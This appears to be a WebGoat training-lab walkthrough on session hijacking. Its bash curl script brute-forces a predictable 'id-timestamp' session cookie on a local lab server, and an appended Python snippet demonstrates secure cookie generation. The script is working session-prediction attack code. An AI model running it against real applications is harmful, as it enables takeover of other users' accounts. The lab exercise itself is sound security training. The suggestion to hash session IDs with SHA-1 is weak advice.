Webgoat - Hijack a Session


In this walkthrough, we will go through the Hijack a Session vulnerability section from the WebGoat labs. We will explore and exploit session hijacking and learn how applications are affected by it. So, let's get started with the hacking without any delay.

Hijack a Session

Hijack a session

  • In this challenge, we have to gain access to an authenticated session belonging to someone else by predicting the value of the hijack_cookie cookie.

Hijack a session

Login panel

  • I looked at the cookie in the Storage section of the browser dev tools and tried to decode it on my own.

Stored cookies

  • The cookie value has two parts separated by a hyphen. The second part is the Unix timestamp (UTC) of the moment the cookie was created.

CyberChef UNIX timestamp

Account Access

  • So we can brute-force the cookie value by incrementing the timestamp in the second part.

Burpsuite POST request

Burpsuite Response

  • I used the script below to brute-force the cookie value. It logs in repeatedly until the first part of the cookie jumps by 2, which means another session was issued in between; that session has the missing ID and a timestamp somewhere between the two timestamps observed, so the second loop tries every value in that range.

#!/bin/bash

username=test
password=test
# JSESSIONID of our own authenticated WebGoat session
JSESSIONID="ek-lLMw7nb30j0quuVYTRvvtMAICq4w-yZwJfuuz"

sessionFoundId=0
sessionFoundStartTime=0
sessionFoundEndTime=0
currentSessionId=0
previousSessionId=""
currentSessionTimestamp=0
previousSessionTimestamp=0

echo "================= Searching for session =================================="
echo

# Phase 1: request sessions until the ID counter skips a value.
for request in $(seq 1 1000); do

# hijack_cookie has the form <id>-<timestamp>; keep the "Set-Cookie:" line from
# the -i output and drop the duplicate "< Set-Cookie:" line printed by -v.
currentSession="$(curl -i -v -X POST "http://localhost/WebGoat/HijackSession/login/?username=$username&password=$password" -H "Cookie: JSESSIONID=$JSESSIONID;" 2>&1 | grep hijack_cookie | grep -v "< Set-Cookie:" | cut -d'=' -f2 | cut -d';' -f1)"
currentSessionId="$(echo "$currentSession" | cut -d'-' -f1)"
currentSessionTimestamp="$(echo "$currentSession" | cut -d'-' -f2)"

echo "$currentSessionId - $currentSessionTimestamp"

if ! [ -z "$previousSessionId" ]
then
    # A gap of 2 means one session was handed out to someone else in between.
    if [ $((currentSessionId - previousSessionId)) -eq 2 ]
    then
        echo
        echo "Session found: $previousSessionId - $currentSessionId"
        echo
        sessionFoundId=$((previousSessionId+1))
        sessionFoundStartTime=$previousSessionTimestamp
        sessionFoundEndTime=$currentSessionTimestamp
        break
    fi
fi

previousSessionId=$currentSessionId
previousSessionTimestamp=$currentSessionTimestamp

done

echo
echo "================= Session Found: $sessionFoundId ================="
echo
echo "| From timestamps $sessionFoundStartTime to $sessionFoundEndTime |"
echo
echo "================= Starting session for $sessionFoundId at $sessionFoundStartTime ================="
echo

# Phase 2: try the missing ID with every timestamp in the observed window.
for timestamp in $(seq -f %1.0f "$sessionFoundStartTime" "$sessionFoundEndTime"); do

    response=$(curl -v -X POST "http://localhost/WebGoat/HijackSession/login/?username=$username&password=$password" -H "Cookie: JSESSIONID=$JSESSIONID; hijack_cookie=$sessionFoundId-$timestamp;secure;" 2>&1 | grep feedback | cut -d':' -f2)
    echo "$sessionFoundId-$timestamp: $response"

done

hijack_cookie.sh

Burpsuite Intercept

Account Access


Conclusion

So, we have completed the WebGoat Hijack a Session vulnerability section. These attacks can be mitigated by generating session identifiers with a random session generation algorithm and hashing them with a secure hashing algorithm like SHA-1 or SHA-256, together with setting the HttpOnly and Secure attributes on the cookie. On that note, I will take your leave and meet you in the next one with another WebGoat vulnerability write-up; till then, “Keep Hacking”.
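As an added example (not from the walkthrough or from WebGoat itself), the snippet below puts the predictable "id-timestamp" cookie scheme seen in hijack_cookie next to the random, flagged cookie the conclusion calls for, and adds a small audit check that flags the predictable format in a list of issued cookies. All function names and the sample values are assumptions made for this illustration.

```python
import re
import secrets

# Constructed stand-in for the weak scheme: a global counter plus the issue time.
# This is the shape an attacker can enumerate (sequential id, bounded timestamp).
def weak_cookie(counter: int, issued_at: int) -> str:
    return f"{counter}-{issued_at}"


# Replacement: 256 bits from the OS CSPRNG, no structure to extrapolate from.
def secure_cookie() -> str:
    return secrets.token_urlsafe(32)


# Set-Cookie line carrying the attributes the conclusion recommends.
def set_cookie_header(name: str, value: str) -> str:
    return f"Set-Cookie: {name}={value}; Path=/; HttpOnly; Secure; SameSite=Strict"


# Audit helper: True when every cookie in an issue log matches "<id>-<unix ts>"
# and the ids strictly increase, i.e. the format gives away neighbouring sessions.
_WEAK = re.compile(r"^(\d+)-(\d{10,13})$")


def is_predictable(issued: list) -> bool:
    ids = []
    for cookie in issued:
        m = _WEAK.match(cookie)
        if not m:
            return False
        ids.append(int(m.group(1)))
    return len(ids) > 1 and all(b > a for a, b in zip(ids, ids[1:]))


if __name__ == "__main__":
    # Constructed sample: four cookies issued one second apart by the weak scheme.
    weak_log = [weak_cookie(i, 1700000000 + i) for i in range(1, 5)]
    print("weak log predictable:", is_predictable(weak_log))
    strong_log = [secure_cookie() for _ in range(4)]
    print("random log predictable:", is_predictable(strong_log))
    print(set_cookie_header("session", secure_cookie()))
```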
